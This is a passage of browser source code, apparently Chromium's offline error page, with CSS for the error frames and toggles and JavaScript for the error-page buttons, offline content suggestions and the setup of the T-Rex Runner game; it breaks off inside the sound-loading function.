  margin: 0 0 16px;
}

#sub-frame-error-details {
  margin: 0 10px;
  text-align: center;
  visibility: hidden;
}

/* Show details only when hovering. */
#sub-frame-error:hover #sub-frame-error-details {
  visibility: visible;
}

/* If the iframe is too small, always hide the error code. */
/* TODO(mmenke): See if overflow: no-display works better, once supported. */
@media (max-width: 200px), (max-height: 95px) {
  #sub-frame-error-details {
    display: none;
  }
}

/* Adjust icon for small embedded frames in apps. */
@media (max-height: 100px) {
  #sub-frame-error .icon-generic {
    height: auto;
    margin: 0;
    padding-top: 0;
    width: 25px;
  }
}

/* details-button is special; it's a <button> element that looks like a link. */
#details-button {
  box-shadow: none;
  min-width: 0;
}

/* Styles for platform dependent separation of controls and details button. */
.suggested-left > #control-buttons,
.suggested-right > #details-button {
  float: left;
}

.suggested-right > #control-buttons,
.suggested-left > #details-button {
  float: right;
}

.suggested-left .secondary-button {
  margin-inline-end: 0;
  margin-inline-start: 16px;
}

#details-button.singular {
  float: none;
}

/* download-button shows both icon and text. */
#download-button {
  padding-bottom: 4px;
  padding-top: 4px;
  position: relative;
}

#download-button::before {
  background: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAQAAABKfvVzAAAAO0lEQVQ4y2NgGArgPxIY1YChsOE/LtBAmpYG0mxpIOSDBpKUo2lpIDZxNJCkHKqlYZAla3RAHQ1DFgAARRroHyLNTwwAAAAASUVORK5CYII=) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAQAAAD9CzEMAAAAZElEQVRYw+3Ruw3AMAwDUY3OzZUmRRD4E9iim9wNwAdbEURHyk4AAAAATiCVK8lLyPsKeT9K3lsownnunfkPxO78hKiYHxBV8x2icr5BVM+/CMf8g3DN34Rzns6ViwHUAUQ/6wIAd5Km7l6c8AAAAABJRU5ErkJggg==) 2x)
    no-repeat;
  content: '';
  display: inline-block;
  height: 24px;
  margin-inline-end: 4px;
  margin-inline-start: -4px;
  vertical-align: middle;
  width: 24px;
}

#download-button:disabled {
  background: rgb(180, 206, 249);
  color: rgb(255, 255, 255);
}

#buttons::after {
  clear: both;
  content: '';
  display: block;
  width: 100%;
}

/* Offline page */
html[dir='rtl'] .runner-container,
html[dir='rtl'].offline .icon-offline {
  transform: scaleX(-1);
}

.offline {
  transition: filter 1.5s cubic-bezier(0.65, 0.05, 0.36, 1),
              background-color 1.5s cubic-bezier(0.65, 0.05, 0.36, 1);
  will-change: filter, background-color;
}

.offline body {
  transition: background-color 1.5s cubic-bezier(0.65, 0.05, 0.36, 1);
}

.offline #main-message > p {
  display: none;
}

.offline.inverted {
  background-color: #fff;
  filter: invert(1);
}

.offline.inverted body {
  background-color: #fff;
}

.offline .interstitial-wrapper {
  color: var(--text-color);
  font-size: 1em;
  line-height: 1.55;
  margin: 0 auto;
  max-width: 600px;
  padding-top: 100px;
  position: relative;
  width: 100%;
}

.offline .runner-container {
  direction: ltr;
  height: 150px;
  max-width: 600px;
  overflow: hidden;
  position: absolute;
  top: 35px;
  width: 44px;
}

.offline .runner-container:focus {
  outline: none;
}

.offline .runner-container:focus-visible {
  outline: 3px solid var(--google-blue-300);
}

.offline .runner-canvas {
  height: 150px;
  max-width: 600px;
  opacity: 1;
  overflow: hidden;
  position: absolute;
  top: 0;
  z-index: 10;
}

.offline .controller {
  height: 100vh;
  left: 0;
  position: absolute;
  top: 0;
  width: 100vw;
  z-index: 9;
}

#offline-resources {
  display: none;
}

#offline-instruction {
  image-rendering: pixelated;
  left: 0;
  margin: auto;
  position: absolute;
  right: 0;
  top: 60px;
  width: fit-content;
}

.offline-runner-live-region {
  bottom: 0;
  clip-path: polygon(0 0, 0 0, 0 0);
  color: var(--background-color);
  display: block;
  font-size: xx-small;
  overflow: hidden;
  position: absolute;
  text-align: center;
  transition: color 1.5s cubic-bezier(0.65, 0.05, 0.36, 1);
  user-select: none;
}

/* Custom toggle */
.slow-speed-option {
  align-items: center;
  background: var(--google-gray-50);
  border-radius: 24px/50%;
  bottom: 0;
  color: var(--error-code-color);
  display: inline-flex;
  font-size: 1em;
  left: 0;
  line-height: 1.1em;
  margin: 5px auto;
  padding: 2px 12px 3px 20px;
  position: absolute;
  right: 0;
  width: max-content;
  z-index: 999;
}

.slow-speed-option.hidden {
  display: none;
}

.slow-speed-option [type=checkbox] {
  opacity: 0;
  pointer-events: none;
  position: absolute;
}

.slow-speed-option .slow-speed-toggle {
  cursor: pointer;
  margin-inline-start: 8px;
  padding: 8px 4px;
  position: relative;
}

.slow-speed-option [type=checkbox]:disabled ~ .slow-speed-toggle {
  cursor: default;
}

.slow-speed-option-label [type=checkbox] {
  opacity: 0;
  pointer-events: none;
  position: absolute;
}

.slow-speed-option .slow-speed-toggle::before,
.slow-speed-option .slow-speed-toggle::after {
  content: '';
  display: block;
  margin: 0 3px;
  transition: all 100ms cubic-bezier(0.4, 0, 1, 1);
}

.slow-speed-option .slow-speed-toggle::before {
  background: rgb(189,193,198);
  border-radius: 0.65em;
  height: 0.9em;
  width: 2em;
}

.slow-speed-option .slow-speed-toggle::after {
  background: #fff;
  border-radius: 50%;
  box-shadow: 0 1px 3px 0 rgb(0 0 0 / 40%);
  height: 1.2em;
  position: absolute;
  top: 51%;
  transform: translate(-20%, -50%);
  width: 1.1em;
}

.slow-speed-option [type=checkbox]:focus + .slow-speed-toggle {
  box-shadow: 0 0 8px rgb(94, 158, 214);
  outline: 1px solid rgb(93, 157, 213);
}

.slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::before {
  background: var(--google-blue-600);
  opacity: 0.5;
}

.slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::after {
  background: var(--google-blue-600);
  transform: translate(calc(2em - 90%), -50%);
}

.slow-speed-option [type=checkbox]:checked:disabled +
  .slow-speed-toggle::before {
  background: rgb(189,193,198);
}

.slow-speed-option [type=checkbox]:checked:disabled +
  .slow-speed-toggle::after {
  background: var(--google-gray-50);
}

@media (max-width: 420px) {
  #download-button {
    padding-bottom: 12px;
    padding-top: 12px;
  }

  .suggested-left > #control-buttons,
  .suggested-right > #control-buttons {
    float: none;
  }

  .snackbar {
    border-radius: 0;
    bottom: 0;
    left: 0;
    width: 100%;
  }
}

@media (max-height: 350px) {
  h1 {
    margin: 0 0 15px;
  }

  .icon-offline {
    margin: 0 0 10px;
  }

  .interstitial-wrapper {
    margin-top: 5%;
  }

  .nav-wrapper {
    margin-top: 30px;
  }
}

@media (min-width: 420px) and (max-width: 736px) and
       (min-height: 240px) and (max-height: 420px) and
       (orientation:landscape) {
  .interstitial-wrapper {
    margin-bottom: 100px;
  }
}

@media (max-width: 360px) and (max-height: 480px) {
  .offline .interstitial-wrapper {
    padding-top: 60px;
  }

  .offline .runner-container {
    top: 8px;
  }
}

@media (min-height: 240px) and (orientation: landscape) {
  .offline .interstitial-wrapper {
    margin-bottom: 90px;
  }

  .icon-offline {
    margin-bottom: 20px;
  }
}

@media (max-height: 320px) and (orientation: landscape) {
  .icon-offline {
    margin-bottom: 0;
  }

  .offline .runner-container {
    top: 10px;
  }
}

@media (max-width: 240px) {
  button {
    padding-inline-end: 12px;
    padding-inline-start: 12px;
  }

  .interstitial-wrapper {
    overflow: inherit;
    padding: 0 8px;
  }
}

@media (max-width: 120px) {
  button {
    width: auto;
  }
}

.arcade-mode,
.arcade-mode .runner-container,
.arcade-mode .runner-canvas {
  image-rendering: pixelated;
  max-width: 100%;
  overflow: hidden;
}

.arcade-mode #buttons,
.arcade-mode #main-content {
  opacity: 0;
  overflow: hidden;
}

.arcade-mode .interstitial-wrapper {
  height: 100vh;
  max-width: 100%;
  overflow: hidden;
}

.arcade-mode .runner-container {
  left: 0;
  margin: auto;
  right: 0;
  transform-origin: top center;
  transition: transform 250ms cubic-bezier(0.4, 0, 1, 1) 400ms;
  z-index: 2;
}

@media (prefers-color-scheme: dark) {
  .icon {
    filter: invert(1);
  }

  .offline .runner-canvas {
    filter: invert(1);
  }

  .offline.inverted {
    background-color: var(--background-color);
    filter: invert(0);
  }

  .offline.inverted body {
    background-color: #fff;
  }

  .offline.inverted .offline-runner-live-region {
    color: #fff;
  }

  #suggestions-list a {
    color: var(--link-color);
  }

  #error-information-button {
    filter: invert(0.6);
  }

  .slow-speed-option {
    background: var(--google-gray-800);
    color: var(--google-gray-100);
  }

  .slow-speed-option .slow-speed-toggle::before,
  .slow-speed-option [type=checkbox]:checked:disabled +
    .slow-speed-toggle::before {
    background: rgb(189,193,198);
  }

  .slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::after,
  .slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::before {
    background: var(--google-blue-300);
  }
}
</style>
  <script>// Copyright 2013 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/**
 * @typedef {{
 *   downloadButtonClick: function(),
 *   reloadButtonClick: function(string),
 *   detailsButtonClick: function(),
 *   diagnoseErrorsButtonClick: function(),
 *   trackEasterEgg: function(),
 *   updateEasterEggHighScore: function(number),
 *   resetEasterEggHighScore: function(),
 *   launchOfflineItem: function(string, string),
 *   savePageForLater: function(),
 *   cancelSavePage: function(),
 *   listVisibilityChange: function(boolean),
 * }}
 */
// eslint-disable-next-line no-var
var errorPageController;

const HIDDEN_CLASS = 'hidden';

// Decodes a UTF16 string that is encoded as base64.
function decodeUTF16Base64ToString(encoded_text) {
  const data = atob(encoded_text);
  let result = '';
  for (let i = 0; i < data.length; i += 2) {
    result +=
        String.fromCharCode(data.charCodeAt(i) * 256 + data.charCodeAt(i + 1));
  }
  return result;
}

function toggleHelpBox() {
  const helpBoxOuter = document.getElementById('details');
  helpBoxOuter.classList.toggle(HIDDEN_CLASS);
  const detailsButton = document.getElementById('details-button');
  if (helpBoxOuter.classList.contains(HIDDEN_CLASS)) {
    /** @suppress {missingProperties} */
    detailsButton.innerText = detailsButton.detailsText;
  } else {
    /** @suppress {missingProperties} */
    detailsButton.innerText = detailsButton.hideDetailsText;
  }

  // Details appears over the main content on small screens.
  if (mobileNav) {
    document.getElementById('main-content').classList.toggle(HIDDEN_CLASS);
    const runnerContainer = document.querySelector('.runner-container');
    if (runnerContainer) {
      runnerContainer.classList.toggle(HIDDEN_CLASS);
    }
  }
}

function diagnoseErrors() {
  if (window.errorPageController) {
    errorPageController.diagnoseErrorsButtonClick();
  }
}

// Subframes use a different layout but the same html file.  This is to make it
// easier to support platforms that load the error page via different
// mechanisms (Currently just iOS). We also use the subframe style for portals
// as they are embedded like subframes and can't be interacted with by the user.
let isSubFrame = false;
if (window.top.location !== window.location || window.portalHost) {
  document.documentElement.setAttribute('subframe', '');
  isSubFrame = true;
}

// Re-renders the error page using |strings| as the dictionary of values.
// Used by NetErrorTabHelper to update DNS error pages with probe results.
function updateForDnsProbe(strings) {
  const context = new JsEvalContext(strings);
  jstProcess(context, document.getElementById('t'));
  onDocumentLoadOrUpdate();
}

// Adds an icon class to the list and removes classes previously set.
function updateIconClass(newClass) {
  const frameSelector = isSubFrame ? '#sub-frame-error' : '#main-frame-error';
  const iconEl = document.querySelector(frameSelector + ' .icon');

  if (iconEl.classList.contains(newClass)) {
    return;
  }

  iconEl.className = 'icon ' + newClass;
}

// Implements button clicks.  This function is needed during the transition
// between implementing these in trunk chromium and implementing them in iOS.
function reloadButtonClick(url) {
  if (window.errorPageController) {
    errorPageController.reloadButtonClick();
  } else {
    window.location = url;
  }
}

function downloadButtonClick() {
  if (window.errorPageController) {
    errorPageController.downloadButtonClick();
    const downloadButton = document.getElementById('download-button');
    downloadButton.disabled = true;
    /** @suppress {missingProperties} */
    downloadButton.textContent = downloadButton.disabledText;

    document.getElementById('download-link-wrapper')
        .classList.add(HIDDEN_CLASS);
    document.getElementById('download-link-clicked-wrapper')
        .classList.remove(HIDDEN_CLASS);
  }
}

function detailsButtonClick() {
  if (window.errorPageController) {
    errorPageController.detailsButtonClick();
  }
}

let primaryControlOnLeft = true;
primaryControlOnLeft = false;

function setAutoFetchState(scheduled, can_schedule) {
  document.getElementById('cancel-save-page-button')
      .classList.toggle(HIDDEN_CLASS, !scheduled);
  document.getElementById('save-page-for-later-button')
      .classList.toggle(HIDDEN_CLASS, scheduled || !can_schedule);
}

function savePageLaterClick() {
  errorPageController.savePageForLater();
  // savePageForLater will eventually trigger a call to setAutoFetchState() when
  // it completes.
}

function cancelSavePageClick() {
  errorPageController.cancelSavePage();
  // setAutoFetchState is not called in response to cancelSavePage(), so do it
  // now.
  setAutoFetchState(false, true);
}

function toggleErrorInformationPopup() {
  document.getElementById('error-information-popup-container')
      .classList.toggle(HIDDEN_CLASS);
}

function launchOfflineItem(itemID, name_space) {
  errorPageController.launchOfflineItem(itemID, name_space);
}

function launchDownloadsPage() {
  errorPageController.launchDownloadsPage();
}

function getIconForSuggestedItem(item) {
  // Note: |item.content_type| contains the enum values from
  // chrome::mojom::AvailableContentType.
  switch (item.content_type) {
    case 1:  // kVideo
      return 'image-video';
    case 2:  // kAudio
      return 'image-music-note';
    case 0:  // kPrefetchedPage
    case 3:  // kOtherPage
      return 'image-earth';
  }
  return 'image-file';
}

function getSuggestedContentDiv(item, index) {
  // Note: See AvailableContentToValue in available_offline_content_helper.cc
  // for the data contained in an |item|.
  // TODO(carlosk): Present |snippet_base64| when that content becomes
  // available.
  let thumbnail = '';
  const extraContainerClasses = [];
  // html_inline.py will try to replace src attributes with data URIs using a
  // simple regex. The following is obfuscated slightly to avoid that.
  const source = 'src';
  if (item.thumbnail_data_uri) {
    extraContainerClasses.push('suggestion-with-image');
    thumbnail = `<img ${source}="${item.thumbnail_data_uri}">`;
  } else {
    extraContainerClasses.push('suggestion-with-icon');
    const iconClass = getIconForSuggestedItem(item);
    thumbnail = `<div><img class="${iconClass}"></div>`;
  }

  let favicon = '';
  if (item.favicon_data_uri) {
    favicon = `<img ${source}="${item.favicon_data_uri}">`;
  } else {
    extraContainerClasses.push('no-favicon');
  }

  if (!item.attribution_base64) {
    extraContainerClasses.push('no-attribution');
  }

  return `
  <div class="offline-content-suggestion ${extraContainerClasses.join(' ')}"
    onclick="launchOfflineItem('${item.ID}', '${item.name_space}')">
      <div class="offline-content-suggestion-texts">
        <div id="offline-content-suggestion-title-${index}"
             class="offline-content-suggestion-title">
        </div>
        <div class="offline-content-suggestion-attribution-freshness">
          <div id="offline-content-suggestion-favicon-${index}"
               class="offline-content-suggestion-favicon">
            ${favicon}
          </div>
          <div id="offline-content-suggestion-attribution-${index}"
               class="offline-content-suggestion-attribution">
          </div>
          <div class="offline-content-suggestion-freshness">
            ${item.date_modified}
          </div>
          <div class="offline-content-suggestion-pin-spacer"></div>
          <div class="offline-content-suggestion-pin"></div>
        </div>
      </div>
      <div class="offline-content-suggestion-thumbnail">
        ${thumbnail}
      </div>
  </div>`;
}

/**
 * @typedef {{
 *   ID: string,
 *   name_space: string,
 *   title_base64: string,
 *   snippet_base64: string,
 *   date_modified: string,
 *   attribution_base64: string,
 *   thumbnail_data_uri: string,
 *   favicon_data_uri: string,
 *   content_type: number,
 * }}
 */
let AvailableOfflineContent;

// Populates a list of suggested offline content.
// Note: For security reasons all content downloaded from the web is considered
// unsafe and must be securely handled to be presented on the dino page. Images
// have already been safely re-encoded but textual content -- like title and
// attribution -- must be properly handled here.
// @param {boolean} isShown
// @param {Array<AvailableOfflineContent>} suggestions
function offlineContentAvailable(isShown, suggestions) {
  if (!suggestions || !loadTimeData.valueExists('offlineContentList')) {
    return;
  }

  const suggestionsHTML = [];
  for (let index = 0; index < suggestions.length; index++) {
    suggestionsHTML.push(getSuggestedContentDiv(suggestions[index], index));
  }

  document.getElementById('offline-content-suggestions').innerHTML =
      suggestionsHTML.join('\n');

  // Sets textual web content using |textContent| to make sure it's handled as
  // plain text.
  for (let index = 0; index < suggestions.length; index++) {
    document.getElementById(`offline-content-suggestion-title-${index}`)
        .textContent =
        decodeUTF16Base64ToString(suggestions[index].title_base64);
    document.getElementById(`offline-content-suggestion-attribution-${index}`)
        .textContent =
        decodeUTF16Base64ToString(suggestions[index].attribution_base64);
  }

  const contentListElement = document.getElementById('offline-content-list');
  if (document.dir === 'rtl') {
    contentListElement.classList.add('is-rtl');
  }
  contentListElement.hidden = false;
  // The list is configured as hidden by default. Show it if needed.
  if (isShown) {
    toggleOfflineContentListVisibility(false);
  }
}

function toggleOfflineContentListVisibility(updatePref) {
  if (!loadTimeData.valueExists('offlineContentList')) {
    return;
  }

  const contentListElement = document.getElementById('offline-content-list');
  const isVisible = !contentListElement.classList.toggle('list-hidden');

  if (updatePref && window.errorPageController) {
    errorPageController.listVisibilityChanged(isVisible);
  }
}

// Called on document load, and from updateForDnsProbe().
function onDocumentLoadOrUpdate() {
  const downloadButtonVisible = loadTimeData.valueExists('downloadButton') &&
      loadTimeData.getValue('downloadButton').msg;
  const detailsButton = document.getElementById('details-button');

  // If offline content suggestions will be visible, the usual buttons will not
  // be presented.
  const offlineContentVisible =
      loadTimeData.valueExists('suggestedOfflineContentPresentation');
  if (offlineContentVisible) {
    document.querySelector('.nav-wrapper').classList.add(HIDDEN_CLASS);
    detailsButton.classList.add(HIDDEN_CLASS);

    document.getElementById('download-link').hidden = !downloadButtonVisible;
    document.getElementById('download-links-wrapper')
        .classList.remove(HIDDEN_CLASS);
    document.getElementById('error-information-popup-container')
        .classList.add('use-popup-container', HIDDEN_CLASS);
    document.getElementById('error-information-button')
        .classList.remove(HIDDEN_CLASS);
  }

  const attemptAutoFetch = loadTimeData.valueExists('attemptAutoFetch') &&
      loadTimeData.getValue('attemptAutoFetch');

  const reloadButtonVisible = loadTimeData.valueExists('reloadButton') &&
      loadTimeData.getValue('reloadButton').msg;

  const reloadButton = document.getElementById('reload-button');
  const downloadButton = document.getElementById('download-button');
  if (reloadButton.style.display === 'none' &&
      downloadButton.style.display === 'none') {
    detailsButton.classList.add('singular');
  }

  // Show or hide control buttons.
  const controlButtonDiv = document.getElementById('control-buttons');
  controlButtonDiv.hidden =
      offlineContentVisible || !(reloadButtonVisible || downloadButtonVisible);

  const iconClass = loadTimeData.valueExists('iconClass') &&
      loadTimeData.getValue('iconClass');

  updateIconClass(iconClass);

  if (!isSubFrame && iconClass === 'icon-offline') {
    document.documentElement.classList.add('offline');
    new Runner('.interstitial-wrapper');
  }
}

function onDocumentLoad() {
  // Sets up the proper button layout for the current platform.
  const buttonsDiv = document.getElementById('buttons');
  if (primaryControlOnLeft) {
    buttonsDiv.classList.add('suggested-left');
  } else {
    buttonsDiv.classList.add('suggested-right');
  }

  onDocumentLoadOrUpdate();
}

document.addEventListener('DOMContentLoaded', onDocumentLoad);
</script>
  <script>// Copyright 2015 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

let mobileNav = false;

/**
 * For small screen mobile the navigation buttons are moved
 * below the advanced text.
 */
function onResize() {
  const helpOuterBox = document.querySelector('#details');
  const mainContent = document.querySelector('#main-content');
  const mediaQuery = '(min-width: 240px) and (max-width: 420px) and ' +
      '(min-height: 401px), ' +
      '(max-height: 560px) and (min-height: 240px) and ' +
      '(min-width: 421px)';

  const detailsHidden = helpOuterBox.classList.contains(HIDDEN_CLASS);
  const runnerContainer = document.querySelector('.runner-container');

  // Check for change in nav status.
  if (mobileNav !== window.matchMedia(mediaQuery).matches) {
    mobileNav = !mobileNav;

    // Handle showing the top content / details sections according to state.
    if (mobileNav) {
      mainContent.classList.toggle(HIDDEN_CLASS, !detailsHidden);
      helpOuterBox.classList.toggle(HIDDEN_CLASS, detailsHidden);
      if (runnerContainer) {
        runnerContainer.classList.toggle(HIDDEN_CLASS, !detailsHidden);
      }
    } else if (!detailsHidden) {
      // Non mobile nav with visible details.
      mainContent.classList.remove(HIDDEN_CLASS);
      helpOuterBox.classList.remove(HIDDEN_CLASS);
      if (runnerContainer) {
        runnerContainer.classList.remove(HIDDEN_CLASS);
      }
    }
  }
}

function setupMobileNav() {
  window.addEventListener('resize', onResize);
  onResize();
}

document.addEventListener('DOMContentLoaded', setupMobileNav);
</script>
  <script>// Copyright 2014 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/**
 * T-Rex runner.
 * @param {string} outerContainerId Outer containing element id.
 * @param {!Object=} opt_config
 * @constructor
 * @implements {EventListener}
 * @export
 */
function Runner(outerContainerId, opt_config) {
  // Singleton
  if (Runner.instance_) {
    return Runner.instance_;
  }
  Runner.instance_ = this;

  this.outerContainerEl = document.querySelector(outerContainerId);
  this.containerEl = null;
  this.snackbarEl = null;
  // A div to intercept touch events. Only set while (playing && useTouch).
  this.touchController = null;

  this.config = opt_config || Object.assign(Runner.config, Runner.normalConfig);
  // Logical dimensions of the container.
  this.dimensions = Runner.defaultDimensions;

  this.gameType = null;
  Runner.spriteDefinition = Runner.spriteDefinitionByType['original'];

  this.altGameImageSprite = null;
  this.altGameModeActive = false;
  this.altGameModeFlashTimer = null;
  this.fadeInTimer = 0;

  this.canvas = null;
  this.canvasCtx = null;

  this.tRex = null;

  this.distanceMeter = null;
  this.distanceRan = 0;

  this.highestScore = 0;
  this.syncHighestScore = false;

  this.time = 0;
  this.runningTime = 0;
  this.msPerFrame = 1000 / FPS;
  this.currentSpeed = this.config.SPEED;
  Runner.slowDown = false;

  this.obstacles = [];

  this.activated = false; // Whether the easter egg has been activated.
  this.playing = false; // Whether the game is currently in play state.
  this.crashed = false;
  this.paused = false;
  this.inverted = false;
  this.invertTimer = 0;
  this.resizeTimerId_ = null;

  this.playCount = 0;

  // Sound FX.
  this.audioBuffer = null;

  /** @type {Object} */
  this.soundFx = {};
  this.generatedSoundFx = null;

  // Global web audio context for playing sounds.
  this.audioContext = null;

  // Images.
  this.images = {};
  this.imagesLoaded = 0;

  // Gamepad state.
  this.pollingGamepads = false;
  this.gamepadIndex = undefined;
  this.previousGamepad = null;

  if (this.isDisabled()) {
    this.setupDisabledRunner();
  } else {
    if (Runner.isAltGameModeEnabled()) {
      this.initAltGameType();
      Runner.gameType = this.gameType;
    }
    this.loadImages();

    window['initializeEasterEggHighScore'] =
        this.initializeHighScore.bind(this);
  }
}

/**
 * Default game width.
 * @const
 */
const DEFAULT_WIDTH = 600;

/**
 * Frames per second.
 * @const
 */
const FPS = 60;

/** @const */
const IS_HIDPI = window.devicePixelRatio > 1;

/** @const */
const IS_IOS = /CriOS/.test(window.navigator.userAgent);

/** @const */
const IS_MOBILE = /Android/.test(window.navigator.userAgent) || IS_IOS;

/** @const */
const IS_RTL = document.querySelector('html').dir == 'rtl';

/** @const */
const ARCADE_MODE_URL = 'chrome://dino/';

/** @const */
const RESOURCE_POSTFIX = 'offline-resources-';

/** @const */
const A11Y_STRINGS = {
  ariaLabel: 'dinoGameA11yAriaLabel',
  description: 'dinoGameA11yDescription',
  gameOver: 'dinoGameA11yGameOver',
  highScore: 'dinoGameA11yHighScore',
  jump: 'dinoGameA11yJump',
  started: 'dinoGameA11yStartGame',
  speedLabel: 'dinoGameA11ySpeedToggle',
};

/**
 * Default game configuration.
 * Shared config for all versions of the game. Additional parameters are
 * defined in Runner.normalConfig and Runner.slowConfig.
 */
Runner.config = {
  AUDIOCUE_PROXIMITY_THRESHOLD: 190,
  AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y: 250,
  BG_CLOUD_SPEED: 0.2,
  BOTTOM_PAD: 10,
  // Scroll Y threshold at which the game can be activated.
  CANVAS_IN_VIEW_OFFSET: -10,
  CLEAR_TIME: 3000,
  CLOUD_FREQUENCY: 0.5,
  FADE_DURATION: 1,
  FLASH_DURATION: 1000,
  GAMEOVER_CLEAR_TIME: 1200,
  INITIAL_JUMP_VELOCITY: 12,
  INVERT_FADE_DURATION: 12000,
  MAX_BLINK_COUNT: 3,
  MAX_CLOUDS: 6,
  MAX_OBSTACLE_LENGTH: 3,
  MAX_OBSTACLE_DUPLICATION: 2,
  RESOURCE_TEMPLATE_ID: 'audio-resources',
  SPEED: 6,
  SPEED_DROP_COEFFICIENT: 3,
  ARCADE_MODE_INITIAL_TOP_POSITION: 35,
  ARCADE_MODE_TOP_POSITION_PERCENT: 0.1,
};

Runner.normalConfig = {
  ACCELERATION: 0.001,
  AUDIOCUE_PROXIMITY_THRESHOLD: 190,
  AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y: 250,
  GAP_COEFFICIENT: 0.6,
  INVERT_DISTANCE: 700,
  MAX_SPEED: 13,
  MOBILE_SPEED_COEFFICIENT: 1.2,
  SPEED: 6,
};


Runner.slowConfig = {
  ACCELERATION: 0.0005,
  AUDIOCUE_PROXIMITY_THRESHOLD: 170,
  AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y: 220,
  GAP_COEFFICIENT: 0.3,
  INVERT_DISTANCE: 350,
  MAX_SPEED: 9,
  MOBILE_SPEED_COEFFICIENT: 1.5,
  SPEED: 4.2,
};


/**
 * Default dimensions.
 */
Runner.defaultDimensions = {
  WIDTH: DEFAULT_WIDTH,
  HEIGHT: 150,
};


/**
 * CSS class names.
 * @enum {string}
 */
Runner.classes = {
  ARCADE_MODE: 'arcade-mode',
  CANVAS: 'runner-canvas',
  CONTAINER: 'runner-container',
  CRASHED: 'crashed',
  ICON: 'icon-offline',
  INVERTED: 'inverted',
  SNACKBAR: 'snackbar',
  SNACKBAR_SHOW: 'snackbar-show',
  TOUCH_CONTROLLER: 'controller',
};


/**
 * Sound FX. Reference to the ID of the audio tag on interstitial page.
 * @enum {string}
 */
Runner.sounds = {
  BUTTON_PRESS: 'offline-sound-press',
  HIT: 'offline-sound-hit',
  SCORE: 'offline-sound-reached',
};


/**
 * Key code mapping.
 * @enum {Object}
 */
Runner.keycodes = {
  JUMP: {'38': 1, '32': 1},  // Up, spacebar
  DUCK: {'40': 1},           // Down
  RESTART: {'13': 1},        // Enter
};


/**
 * Runner event names.
 * @enum {string}
 */
Runner.events = {
  ANIM_END: 'webkitAnimationEnd',
  CLICK: 'click',
  KEYDOWN: 'keydown',
  KEYUP: 'keyup',
  POINTERDOWN: 'pointerdown',
  POINTERUP: 'pointerup',
  RESIZE: 'resize',
  TOUCHEND: 'touchend',
  TOUCHSTART: 'touchstart',
  VISIBILITY: 'visibilitychange',
  BLUR: 'blur',
  FOCUS: 'focus',
  LOAD: 'load',
  GAMEPADCONNECTED: 'gamepadconnected',
};

Runner.prototype = {
  /**
   * Initialize alternative game type.
   */
  initAltGameType() {
    if (GAME_TYPE.length > 0) {
      this.gameType = loadTimeData && loadTimeData.valueExists('altGameType') ?
          GAME_TYPE[parseInt(loadTimeData.getValue('altGameType'), 10) - 1] :
          '';
    }
  },

  /**
   * Whether the easter egg has been disabled. CrOS enterprise enrolled devices.
   * @return {boolean}
   */
  isDisabled() {
    return loadTimeData && loadTimeData.valueExists('disabledEasterEgg');
  },

  /**
   * For disabled instances, set up a snackbar with the disabled message.
   */
  setupDisabledRunner() {
    this.containerEl = document.createElement('div');
    this.containerEl.className = Runner.classes.SNACKBAR;
    this.containerEl.textContent = loadTimeData.getValue('disabledEasterEgg');
    this.outerContainerEl.appendChild(this.containerEl);

    // Show notification when the activation key is pressed.
    document.addEventListener(Runner.events.KEYDOWN, function(e) {
      if (Runner.keycodes.JUMP[e.keyCode]) {
        this.containerEl.classList.add(Runner.classes.SNACKBAR_SHOW);
        document.querySelector('.icon').classList.add('icon-disabled');
      }
    }.bind(this));
  },

  /**
   * Setting individual settings for debugging.
   * @param {string} setting
   * @param {number|string} value
   */
  updateConfigSetting(setting, value) {
    if (setting in this.config && value !== undefined) {
      this.config[setting] = value;

      switch (setting) {
        case 'GRAVITY':
        case 'MIN_JUMP_HEIGHT':
        case 'SPEED_DROP_COEFFICIENT':
          this.tRex.config[setting] = value;
          break;
        case 'INITIAL_JUMP_VELOCITY':
          this.tRex.setJumpVelocity(value);
          break;
        case 'SPEED':
          this.setSpeed(/** @type {number} */ (value));
          break;
      }
    }
  },

  /**
   * Creates an on page image element from the base 64 encoded string source.
   * @param {string} resourceName Name in data object,
   * @return {HTMLImageElement} The created element.
   */
  createImageElement(resourceName) {
    const imgSrc = loadTimeData && loadTimeData.valueExists(resourceName) ?
        loadTimeData.getString(resourceName) :
        null;

    if (imgSrc) {
      const el =
          /** @type {HTMLImageElement} */ (document.createElement('img'));
      el.id = resourceName;
      el.src = imgSrc;
      document.getElementById('offline-resources').appendChild(el);
      return el;
    }
    return null;
  },

  /**
   * Cache the appropriate image sprite from the page and get the sprite sheet
   * definition.
   */
  loadImages() {
    let scale = '1x';
    this.spriteDef = Runner.spriteDefinition.LDPI;
    if (IS_HIDPI) {
      scale = '2x';
      this.spriteDef = Runner.spriteDefinition.HDPI;
    }

    Runner.imageSprite = /** @type {HTMLImageElement} */
        (document.getElementById(RESOURCE_POSTFIX + scale));

    if (this.gameType) {
      Runner.altGameImageSprite = /** @type {HTMLImageElement} */
          (this.createImageElement('altGameSpecificImage' + scale));
      Runner.altCommonImageSprite = /** @type {HTMLImageElement} */
          (this.createImageElement('altGameCommonImage' + scale));
    }
    Runner.origImageSprite = Runner.imageSprite;

    // Disable the alt game mode if the sprites can't be loaded.
    if (!Runner.altGameImageSprite || !Runner.altCommonImageSprite) {
      Runner.isAltGameModeEnabled = () => false;
      this.altGameModeActive = false;
    }

    if (Runner.imageSprite.complete) {
      this.init();
    } else {
      // If the images are not yet loaded, add a listener.
      Runner.imageSprite.addEventListener(Runner.events.LOAD,
          this.init.bind(this));
    }
  },

  /**
   * Load and decode base 64 encoded sounds.
   */
  loadSounds() {
    if (!IS_IOS) {
      this.audioContext = new AudioContext();

      const resourceTemplate =
          document.getElementById(this.config.RESOURCE_TEMPLATE_ID).content;

      for (const sound in Runner.sounds) {
        let soundSrc =
            resourceTemplate.getElementById(Runner.sounds[sound]).src;
